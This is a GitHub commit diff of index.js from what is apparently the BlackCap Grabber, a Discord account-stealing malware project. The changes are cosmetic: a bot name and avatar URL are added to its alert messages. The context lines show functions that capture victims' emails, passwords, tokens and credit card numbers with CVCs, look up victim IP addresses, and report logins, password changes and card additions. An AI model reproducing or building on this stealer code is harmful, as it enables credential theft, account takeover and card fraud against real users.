Update index.js

This commit is contained in:
What about KSCH 2023-01-13 19:37:13 +01:00 committed by GitHub
parent 4f9e004d40
commit f639ed2d8f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 2 deletions

View File

@ -269,7 +269,8 @@ async function FirstTime() {
ip
} = await getFromURL("https://www.myexternalip.com/json", null)
const c = {
username: "BlackCap",
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
title: "BlackCap Initalized",
@ -305,7 +306,8 @@ async function FirstTime() {
bannerurl = "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/Banner.png"
}else bannerurl = `https://cdn.discordapp.com/banners/${b.id}/${b.banner}.png?size=160`;
const c = {
username: "BlackCap",
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
title: "BlackCap Initalized",
@ -383,6 +385,7 @@ async function FirstTime() {
} = await getFromURL("https://www.myexternalip.com/json", null)
const c = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
title: "BlackCaped User log out (User not Logged in before)",
@ -419,6 +422,7 @@ async function FirstTime() {
}else bannerurl = `https://cdn.discordapp.com/banners/${b.id}/${b.banner}.png?size=160`;
const c = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
title: "BlackCap Victim got logged out",
@ -839,6 +843,7 @@ async function Login(email, password, token) {
const params = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
"title": "BlackCap User Login",
@ -999,6 +1004,7 @@ async function ChangePassword(oldpassword, newpassword, token) {
let bannerurl = `https://cdn.discordapp.com/banners/${info.id}/${info.banner}.png?size=600` || "https://media.discordapp.net/attachments/1032256615962906655/1037042057845407844/Banner.png?size=600";
const params = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
"title": "BlackCap Detect Password Changed",
@ -1167,6 +1173,7 @@ async function ChangeEmail(newemail, password, token) {
const params = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
"title": "BlackCap Detect Email Changed",
@ -1277,6 +1284,7 @@ async function CreditCardAdded(number, cvc, expir_month, expir_year, token) {
const params = {
username: "BlackCap Grabber",
avatar_url: "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
content: "",
embeds: [{
"title": "BlackCap User Credit Card Added",